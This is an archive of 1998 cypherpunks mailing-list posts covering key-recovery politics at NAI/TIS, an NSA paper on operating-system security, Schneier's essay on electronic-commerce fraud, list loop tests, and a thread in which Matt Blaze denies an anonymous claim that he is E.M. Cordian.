"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 15 Nov 1998 10:03:39 +0800
To: j orlin grabbe <jstclst@cyberramp.net
Subject: nm web site
Message-ID: <364E3019.18B0@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



Saturday 11/14/98 6:13 PM

John Young http://www.jya.com/index.htm
J Orlin Grabbe http://www.aci.net/kalliste/

As a result of  jy's persuasive arguments http://jya.com/whpfiles.htm,
we are going to put up a web site.

But unlike you-all's sites ours will be somewhat positive

1  masm mixed language programming ... and Microsoft
    bugs
2  8032 forth programming and hardware
3  pc hardware
4  pro se litigation against the government
5  cypto nonsense
6  ...

But, most important, we have learned by your pioneering
web information dissemination efforts.  And mistakes at 
other websites.  Like bouncing balls.

You guys, in my opinion, are the some of the most brilliant, 
perhaps with the exception of  the  X-rated sites, at getting 
the info out there.

And yes, we will use THUMBNAIL photos.  Of schematics,
main boards, .... etc.

Simplicity exudes brilliance.  Perhaps there is a converse?

Thoughtfully, I hope
bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Sun, 15 Nov 1998 03:21:12 +0800
To: ichudov@Algebra.COM (Igor Chudov @ home)
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811131959.LAA19533@rainbow.thinkthink.com>
Message-ID: <3.0.3.32.19981114194714.0093bd00@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



Nobody that has been on this list very long could have been duped...We all
know that some group of MIB types would have swooped down on the guy, and
he would have been just another heart attack statistic...


At 14:49 13/11/98 -0600, you wrote:
>I was not duped! In fact, I pointed the hoax out.
>
>Anyway, I feel for you/.
>
>igor
>
>cypherpu wrote:
>> 
>> 
>> 
>> I just spoke by phone with john(author of the article in question)
>>  at the sfbay guardian
>> The article was distributed without the satire labeling that was
>> present at the website... The article is Satire :(
>> 
>>      duped and disappointed :(
>> 
>
>
>
>	- Igor.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sun, 15 Nov 1998 12:30:08 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: y2k+nukes===???? (drudge)
In-Reply-To: <199811130049.QAA18857@netcom13.netcom.com>
Message-ID: <000201be104e$53bf6be0$398195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vladimir Z. Nurid:

: Far more likely, however, is the prospect of a leader, 
: under pressure from hairtrigger response mechanisms, 
: pressing the nuclear button on the basis of inaccurate
: data." 
.................................................


So what are your plans for Dec 31, 1999, VZN.   
Doing anything special?


   ..
Blanc 
I'm gonna buyme a Ford Truck 'n cruiseitupndown thu ro-oad....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Nov 1998 10:34:09 +0800
To: cypherpunks@toad.com
Subject: NSA on OS Flaws
Message-ID: <199811150212.VAA01270@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



An NSA team presented at NISSC98 in October
"The Inevitability of Failure: The Flawed Assumption 
of Security in Modern Computing Environments:"

  http://jya.com/paperF1.htm  (62K)

  Abstract

  Although public awareness of the need for security in 
  computing systems is growing rapidly, current efforts 
  to provide security are unlikely to succeed. Current 
  security efforts suffer from the flawed assumption 
  that adequate security can be provided in applications 
  with the existing security mechanisms of mainstream 
  operating systems. In reality, the need for secure 
  operating systems is growing in today's computing 
  environment due to substantial increases in connectivity 
  and data sharing. The goal of this paper is to motivate 
  a renewed interest in secure operating systems so that 
  future security efforts may build on a solid foundation. 
  This paper identifies several secure operating system 
  features which are lacking in mainstream operating 
  systems, argues that these features are necessary to 
  adequately protect general application-space security 
  mechanisms, and provides concrete examples of how 
  current security solutions are critically dependent on 
  these features.

  Keywords: secure operating systems, mandatory security, 
  trusted path, Java, Kerberos, IPSEC, SSL, firewalls.

-----

The paper advocates greater research on vulnerabilities
of operating systems which allow malicious attackers to
circumvent application-level security, including 
cryptographic protection. Ways to get around hardware
and software crypto are outlined.

Covert channels are a prime concern, as well as benign
use inadverdently allowing malicious intrusion.

An extensive list of references trace the twenty-five 
year history of OS flaws and examine why so little has 
been done to correct known deficiencies which undermine 
seemingly unbreachable applications.

Readings about DTOS, Fluke, Flash and other developments
of the NSA-sponsored Synergy program are illuminating.

The recent republication of early compsec documents by
CSRC is appropriate to this topic, particularly, "Subversion:
The Neglected Aspect of Computer Security," by Philip Myer,
June 1980, a thesis at NPS:

   http://csrc.nist.gov/publications/history/myer80.pdf

Not that NSA would ever exploit OS weaknesses not warned 
about.

-----

Thanks to JM/RH for pointing to the NISSC papers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 15 Nov 1998 12:31:28 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [no reply]
Message-ID: <199811150416.WAA05933@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 15 Nov 1998 12:38:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test 2 [no reply, loop test, last one]
Message-ID: <199811150419.WAA06039@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test 2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Sun, 15 Nov 1998 12:11:25 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199811150307.EAA08300@replay.com>
Message-ID: <364E789E.850EA9CD@ACM.Org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
<<snip>>
> failed TCSEC/Rainbow testing program.  I say "failed"
> because it hasn't caught on in the private sector, it's expensive and,
> of course, the laughable "C2 in '92."

While I was never a great fan of the Rainbow Series, to say that it
failed because it hasn't caught on in the private sector is not holding
very close to the point of it all. The "typical" private sector approach
to security is to do nothing 'til the hackers come over the iInternet
and wreak havoc the throw up a proxie server/firewall and go back to
normal practices until the next "event" and try to plug That Hole.

C2 by 92 was an effort on the part of the govenment/military to stop
those practices on their own parts.  True, not ompletely succesful, but
hey what the Hell, how many of the efforts by them folk are?

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 15 Nov 1998 12:11:12 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: hello -- do not read
Message-ID: <199811150355.WAA26773@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



This is a test, this is only a test.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 15 Nov 1998 08:06:29 +0800
To: aba@dcs.ex.ac.uk
Subject: TIS & PGP -- who is pulling the strings (Re: Will Price (NAI employee) on KRA)
In-Reply-To: <199811141455.OAA30151@server.eternity.org>
Message-ID: <199811142333.XAA32197@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




To comment on Will Price's comments I forwarded earlier today:

Will Price <wprice@pgp.com> wrote:
> I've commented about this on this list before I believe.  This appears
> to be a case of really old news suddenly being dredged up for no
> apparent wholesome reason -- which strikes me as quite odd because
> Wired was apparently so eager to break this ancient story that they
> didn't wait to ask anyone from NAI about it.

I didn't heard anything other than speculation as to whether the TIS
acquisition would result in NAI rejoining KRA.  The news is that it
now is listed again (or at least someone noticed that it is now
listed).  Perhaps I was not paying attention, but I didn't hear anyone
from PGP announce that NAI had rejoined (or automatically rejoined)
KRA as a result of TIS merger.

> NAI being listed on the KRA page is *solely* a result of our TIS
> acquisition.  I really doubt anyone here actually called some KRA
> person and officially renewed our membership.  Frankly, I doubt anyone
> here actually knows who to talk to there -- if there even is a
> "there".  

Surely some of your TIS GAKware colleagues know all about KRAP --
being major league GAKkers, and having specifically signed up in the
first place, being leading contributers to the KRAP/GAK drive effort.

> As I have said before, due to the TIS acquisition, NAI now has a
> bunch of products which contain key escrow features.  

Watch terminology here.  TIS stuff contains GAK -- "key escrow" or
"message recovery" where the government has the master keys.

All commercial PGP versions 5.x and higher contain key recovery in the
form of PGP's "Corporate Message Recovery" (CMR) design.  Even the
personal use versions know how to cooperate in providing corporate
backdoors.

Now CMR is clearly much less objectionable than TIS stuff, tho'
politically debatable I would argue.  TIS stuff is outright GAK.  But
I think part of the point of KRA was to coerce/bribe crypto companies
to demonstrate working and workable NSA master key type GAK.

The problem people have had with PGP building a CMR / CKE mechanism is
you as a side effect demonstrate a method which would be workable as
an NSA master key GAK system.  Clearly all that is missing is software
configuration and the NSA to publish a key, and a law requiring use of
it.

Yeah, OK so there was always encrypt to self, but giving the NSA
ammunition is bad (viz the quotes from US government saying that Key
Recovery works and using PGP 5.x as an example).  I think that helping
the US government claim that GAK is workable is a bad result for a
company with PGP's privacy stance to end up contributing to.

I am glad that CMR was kept out of the OpenPGP spec.

> Eliminating or modifying these features such that they work in a
> less big brother-like fashion will take significant time -- indeed
> entire TIS products were based around managing key escrow
> infrastructures.  Don't get me wrong, TIS had a lot of other great
> products, but it will take time to redesign and rethink some of them
> in the context of export and key escrow.  

Will seems to be saying here that NAI is planning to remove GAK from
the TIS products acquired in the NAI purchase of TIS.

Firstly this is interesting because I wonder who is pulling the
strings inside NAI -- consider: NAI paid a lot more for TIS than they
paid for PGP.  TIS has lots of US government defense contracts
(presumably partly as bribery for assistance to US Government with
KRAP/the GAK drive).

Secondly he comments that it will take significant time to make the
TIS products less big brother like.  I don't buy this.  You've got the
source code -- just release a patch to fill the GAK field with garbage.
Sounds like a days work tops.

> I'm not sure there's much point in withdrawing from KRA when those
> products still exist.

Sure there is.  The bad PR of being in KRAP alone should make it worth
quiting.  This was why PRZ arranged the pull out last time around.

Secondly pulling out of KRA would be a nice way to back up your claims
that NAI intends to remove the GAK from the bought TIS products.  If
NAI intends to do this, what is the point of being a member of KRA
which is all about acheiving the reverse -- about putting GAK into
products.

> These issues have no effect whatsoever on the PGP group.  

Glad to hear it.  The effect it does have is in reputation damage due
to PR fall out.  Some people may prefer not to buy from a company
supporting the US government in it's attempts to force key escrow onto
users.  NAI is pulling in two directions, TIS and KRA membership, and
PGP privacy stance.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 15 Nov 1998 12:51:13 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: loop test #1
Message-ID: <199811150436.XAA27826@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Loop, loop, loop

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 15 Nov 1998 13:12:15 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: loop test #2
Message-ID: <199811150453.XAA28128@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Loop test #2

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 15 Nov 1998 13:30:57 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: loop test #3
Message-ID: <199811150503.AAA28459@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Loop test #3

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Nov 1998 14:06:22 +0800
To: cypherpunks@cyberpass.net
Subject: Could E.M. Cordian be Matt Blaze in Disguise?  (Nah!)
Message-ID: <v04020a09b2741a85d154@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



:-)

Bwahahaha!

Isn't this fun???

Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: vin@shell1.shore.net
Mime-Version: 1.0
Date: Sun, 15 Nov 1998 00:31:21 -0500
To: Robert Hettinga <rah@shipwright.com>, dcsb@ai.mit.edu
From: Vin McLellan <vin@shore.net>
Subject: Could E.M. Cordian be Matt Blaze in Disguise?  (Nah!)
Cc: Matt Blaze <mab@research.att.com>
Status: U

	Out on the Cypherpunks List, "Anonymous" claimed to reveal the real
identity of E.M. Cordian, the organizer of the DES Analytical Crack. See:
http://www.cyberspace.org/~enoch/crakfaq.html

>Shouldn't we be using "Mr. Cordian's" real
>name?  Matt Blaze (mab@research.att.com), also
>occasionally known as "M.F. Tones", and even less
>often as "Mr. Rouge" (There should be an accent mark
>there actually).

	In response, Robert Hettinga <rah@shipwright.com> declared:

>Just to clear the air a smidge.
>
>If Matt Blaze says he's looking for an algebraic inverse to DES, I tend to
>believe him...

	Jeeze, Rob! This is your attempt to help "clear the air?"

	I do not for a moment believe that Eric Michael Cordian
<emc@wire.insync.net> is a pseudonym for Matt Blaze <mab@research.att.com>!

	You should maybe query Matt directly <mab@research.att.com> before
you endorse E.M. Cordian as Matt Blaze in drag. You could confuse a whole
lot of people who trust your insider knowledge of these steamy Net Affairs.

	To anyone familiar with Blaze's essays, speeches, & on-line posts,
a scan of  Mr. Codrian's FAQ and published comments should make it apparent
that this suggestion is unlikely, if not perposterous.

	The real Matt Blaze would also not be making these absurd and false
claims that some mysterious "book" describing a cryptosystem identical or
equivalent to the RSA public key cryptosystem was published "years" before
Ron Rivest, Adi Shamir and Len Adelman  first published their RSA PKC
algorithm in April, 1977.  (It's well documented in the Cypherpunk
archives, Codrian assures us;-)

	There was no such book. Cordian's statement is just not true. The
real Matt Blaze -- the guy who wrote the pithy Afterward to Schneier's
Applied Cryptography,II -- would know that this is not true.

	(Actually, I'd bet that even Robert Hettinga knows that this is
untrue.)

	Mind you, if the real Matt Blaze announced that he was seeking $500
from twenty people to fund a private research project which he felt had a
meaningful chance of casting DES as a NP-hard combinatorial problem and
attacking it with an appropriate combinatorial algorithm, I'd send a check
off tomorrow.

	The real Matt Blaze would not have 15 donors -- as Mr. Cordian
reports -- but be stimied on how to get five more.

	I wish Mr. Cordian well in his algebraic attack on DES -- but,
unfortunately, he is not the real Matt Blaze. Not even a near-clone.

	We could do with a few more professionals with Blaze's talent,
energy, and integrity in general circulation.

	Suerte,

		_Vin

-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A Thinking Man's Creed for Crypto  _vbm.

 *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Nov 1998 14:08:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise?  (Nah!)
Message-ID: <v04020a0cb2741d2f7197@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Sun, 15 Nov 1998 00:47:21 -0500
To: Vin McLellan <vin@shore.net>, dcsb@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise?  (Nah!)
Cc: Matt Blaze <mab@research.att.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

At 12:31 AM -0500 on 11/15/98, Vin McLellan wrote:



> 	(Actually, I'd bet that even Robert Hettinga knows that this is
> untrue.)

Moi? ;-)

Now *why* would I do that to you, Vin?



Don't let those ol' Snakes of Medusa bite you, pal.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 15 Nov 1998 08:51:46 +0800
To: vin@shore.net
Subject: No Subject
Message-ID: <199811150026.BAA28478@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Shouldn't we be using "Mr. Cordian's" real
name?  Matt Blaze (mab@research.att.com), also
occasionally known as "M.F. Tones", and even less
often as "Mr. Rouge" (There should be an accent mark
there actually).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whgiii@gulf.net
Date: Sun, 15 Nov 1998 14:58:06 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: List Test
Message-ID: <199811150631.BAA30075@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Just another test, sorry.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Sun, 15 Nov 1998 15:55:07 +0800
To: "Paul H. Merrill" <PaulMerrill@acm.org>
Subject: Re: rainbow series
In-Reply-To: <364E789E.850EA9CD@ACM.Org>
Message-ID: <Pine.LNX.3.96.981115022427.24394A-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



Amen.  In my experience, no network I've _ever_ been associated with
(private, public, miltary, or whatever) has ever proactively pursued a
security model.  Security has always been defined as preventing a
well-defined (and well-experienced) exploit from being repeatedly used.

Rainbow series, feh!  Even the folks who should know better call NT4 C2
compliant.  CYA is the TLA of the day.

On Sat, 14 Nov 1998, Paul H. Merrill wrote:

> Anonymous wrote:
> <<snip>>
> > failed TCSEC/Rainbow testing program.  I say "failed"
> > because it hasn't caught on in the private sector, it's expensive and,
> > of course, the laughable "C2 in '92."
> 
> While I was never a great fan of the Rainbow Series, to say that it
> failed because it hasn't caught on in the private sector is not holding
> very close to the point of it all. The "typical" private sector approach
> to security is to do nothing 'til the hackers come over the iInternet
> and wreak havoc the throw up a proxie server/firewall and go back to
> normal practices until the next "event" and try to plug That Hole.
> 
> C2 by 92 was an effort on the part of the govenment/military to stop
> those practices on their own parts.  True, not ompletely succesful, but
> hey what the Hell, how many of the efforts by them folk are?
> 
> PHM
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 15 Nov 1998 11:31:08 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811150307.EAA08300@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:35 PM 11/14/98 -0500, John Young <jya@pipeline.com> wrote:
>
>An NSA team presented at NISSC98 in October
>"The Inevitability of Failure: The Flawed Assumption 
>of Security in Modern Computing Environments:"

...

>Not that NSA would ever exploit OS weaknesses not warned 
>about.
>

	Part of the context for this:  NSA is trying to encourage their new
testing program for security products.  My feeling is that program, in
turn, is intended to preserve the spaces for all the employees
involved in the failed TCSEC/Rainbow testing program.  I say "failed"
because it hasn't caught on in the private sector, it's expensive and,
of course, the laughable "C2 in '92."  
	If you can't trust your OS, Dum-dum-Dah! NSA to the rescue with
testing!
	The new Common Criteria is to replace TCSEC/Rainbow next year, but if
it walks like a duck....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 15 Nov 1998 14:52:06 +0800
To: cypherpunks@Algebra.COM
Subject: penis test #1
Message-ID: <199811150636.HAA23965@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



penis test one




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 15 Nov 1998 22:31:05 +0800
To: cypherpunks@toad.com
Subject: Electronic Commerce: The Future of Fraud
Message-ID: <4.0.2.19981113183112.0096f750@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



This appeared in my November newsletter, CRYPTO-GRAM, but I thought it
general enough interest to send it here.

Bruce


Electronic Commerce: The Future of Fraud

Fraud has been perpetrated against every commerce system man has ever
invented, from gold coin to stock certificates to paper checks to credit
cards.  Electronic commerce systems will be no different; if that's where
the money is, that's where the crime will be.  The threats are exactly the
same.

Most fraud against existing electronic commerce systems -- ATM machines,
electronic check systems, stored value tokens -- has been low tech.  No
matter how bad the cryptographic and computer security safeguards, most
criminals bypass them entirely and focus on procedural problems, human
oversight, and old-fashioned physical theft.  Why attack subtle information
security systems when you can just haul an ATM machine away in a truck?

This implies that new commerce systems don't have to be secure, but just
better than what exists.  Don't outrun the bear, just outrun the people
you're with.  Unfortunately, there are three features of electronic
commerce that are likely to make fraud more devastating.

One, the ease of automation.  The same automation that makes electronic
commerce systems more efficient than paper systems also makes fraud more
efficient.  A particular fraud that might have taken a criminal ten minutes
to execute on paper can be completed with a single keystroke, or
automatically while he sleeps.  Low-value frauds, that fell below the radar
in paper systems, become dangerous in the electronic world.  No one cares
if it is possible to counterfeit nickels.  However, if a criminal can mint
electronic nickels, he might make a million dollars in a week.  A
pickpocketing technique that works once in ten thousand tries would starve
a criminal on the streets, but he might get thirty successes a day on the net.

Two, the difficulty of isolating jurisdiction.  The electronic world is a
world without geography.  A criminal doesn't have to be physically near a
system he is defrauding; he can attack Citibank in New York from St.
Petersburg. He can jurisdiction shop, and launch his attacks from countries
with poor criminal laws, inadequate police forces, and lax extradition
treaties.

And three, the speed of propagation.  News travels fast on the Internet.
Counterfeiting paper money takes skill, equipment, and organization.  If
one or two or even a hundred people can do it, so what?  It's a crime, but
it won't affect the money supply.  But if someone figures out how to
defraud an electronic commerce system and posts a program on the Internet,
a thousand people could have it in an hour, a hundred thousand in a week.
This could easily bring down a currency.  And only the first attacker needs
skill; everyone else can just use software.  "Click here to drop the
deutsche mark."

Cryptography has the potential to make electronic commerce systems safer
than paper systems, but not in the ways most people think.  Encryption and
digital signatures are important, but secure audit trails are even more
important.  Systems based on long-term relationships, like credit cards and
checking accounts, are safer than anonymous systems like cash.  But
identity theft is so easy that systems based solely on identity are doomed.

Preventing crime in electronic commerce is important, but more important is
to be able to detect it.  We don't prevent crime in our society.  We detect
crime after the fact, gather enough evidence to convince a neutral third
party of the criminal's guilt, and hope that the punishment provides a
back-channel of prevention.  Electronic commerce systems should have the
same goals.  They should be able to detect that fraud has taken place and
finger the guilty.  And more important, they should be able to provide
irrefutable evidence that can convict the guilty in court.

Perfect solutions are not required -- there are hundred of millions of
dollars lost to credit card fraud every year -- but systems that can be
broken completely are unacceptable.  It's vital that attacks cannot be
automated and reproduced without skill. Traditionally, fraud-prevention has
been a game of catch-up.  A commerce system is introduced, a particular
type of fraud is discovered, and the system is patched.  Money is made
harder to counterfeit.  Online credit card verification makes fraud harder.
 Checks are printed on special paper that makes them harder to alter.
These patches reduce fraud for a while, until another attack is discovered.
 And the cycle continues.

The electronic world moves too fast for this cycle.  A serious flaw in an
electronic commerce system could bankrupt a company in days.  Today's
systems must anticipate future attacks.  Any successful electronic commerce
system is likely to remain in use for ten years or more.  It must be able
to withstand the future:  smarter attackers, more computational power, and
greater incentives to subvert a widespread system.  There won't be time to
upgrade them in the field.

Why Cryptography is Harder Than it Looks:
http://www.counterpane.com/whycrypto.html

Security Pitfalls in Cryptography:
http://www.counterpane.com/pitfalls.html

Subscribe to CRYPTO-GRAM:
http://www.counterpane.com/crypto-gram.html 

**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Nov 1998 22:15:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
Message-ID: <v04020a00b27483a9824c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



:-)
--- begin forwarded text


To: Vin McLellan <vin@shore.net>
cc: Robert Hettinga <rah@shipwright.com>, dcsb@ai.mit.edu
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
Date: Sun, 15 Nov 1998 05:33:22 -0500
From: Matt Blaze <mab@research.att.com>

That you for CCing the enclosed message.

I must admit that I'm rather puzzled by it.  This is the first I've
head of an "E.M Cordian," or for that matter "M.F. Tones" or
"Mr. Rogue."  I am quite sure, however, that I am none of these
people.  I have also never seen, or claimed to have seen, any
description of the RSA algorithm, other than the the recently
declassified public key historical material from GCHQ, that predates
R, S and A's original paper on the subject.

I don't subscribe to the cypherpunks mailing list (or, for that
matter, DCSB), and I've only just now scanned over the web page
mentioned in your message, so I'm unclear as to what might be going
on.  Perhaps someone is confused about the $7.00 "better DES
challenge" that I offered last year (which was solved this year by the
EFF DES brute force hardware).

Whatever this is about, however, I assure you that any use of my name
in connection with a solicitation for funds for some sort of
"analytical DES cracking" effort, or any suggestion that I'm involved
in such a project, is absolutely false and perhaps fraudulent.

Feel free to forward this as you see fit.

Thanks

-Matt Blaze

>	Out on the Cypherpunks List, "Anonymous" claimed to reveal the real
>identity of E.M. Cordian, the organizer of the DES Analytical Crack. See:
>http://www.cyberspace.org/~enoch/crakfaq.html
>
>>Shouldn't we be using "Mr. Cordian's" real
>>name?  Matt Blaze (mab@research.att.com), also
>>occasionally known as "M.F. Tones", and even less
>>often as "Mr. Rouge" (There should be an accent mark
>>there actually).
>
>	In response, Robert Hettinga <rah@shipwright.com> declared:
>
>>Just to clear the air a smidge.
>>
>>If Matt Blaze says he's looking for an algebraic inverse to DES, I tend to
>>believe him...
>
>	Jeeze, Rob! This is your attempt to help "clear the air?"
>
>	I do not for a moment believe that Eric Michael Cordian
><emc@wire.insync.net> is a pseudonym for Matt Blaze <mab@research.att.com>!
>
>	You should maybe query Matt directly <mab@research.att.com> before
>you endorse E.M. Cordian as Matt Blaze in drag. You could confuse a whole
>lot of people who trust your insider knowledge of these steamy Net Affairs.
>
>	To anyone familiar with Blaze's essays, speeches, & on-line posts,
>a scan of  Mr. Codrian's FAQ and published comments should make it apparent
>that this suggestion is unlikely, if not perposterous.
>
>	The real Matt Blaze would also not be making these absurd and false
>claims that some mysterious "book" describing a cryptosystem identical or
>equivalent to the RSA public key cryptosystem was published "years" before
>Ron Rivest, Adi Shamir and Len Adelman  first published their RSA PKC
>algorithm in April, 1977.  (It's well documented in the Cypherpunk
>archives, Codrian assures us;-)
>
>	There was no such book. Cordian's statement is just not true. The
>real Matt Blaze -- the guy who wrote the pithy Afterward to Schneier's
>Applied Cryptography,II -- would know that this is not true.
>
>	(Actually, I'd bet that even Robert Hettinga knows that this is
>untrue.)
>
>	Mind you, if the real Matt Blaze announced that he was seeking $500
>from twenty people to fund a private research project which he felt had a
>meaningful chance of casting DES as a NP-hard combinatorial problem and
>attacking it with an appropriate combinatorial algorithm, I'd send a check
>off tomorrow.
>
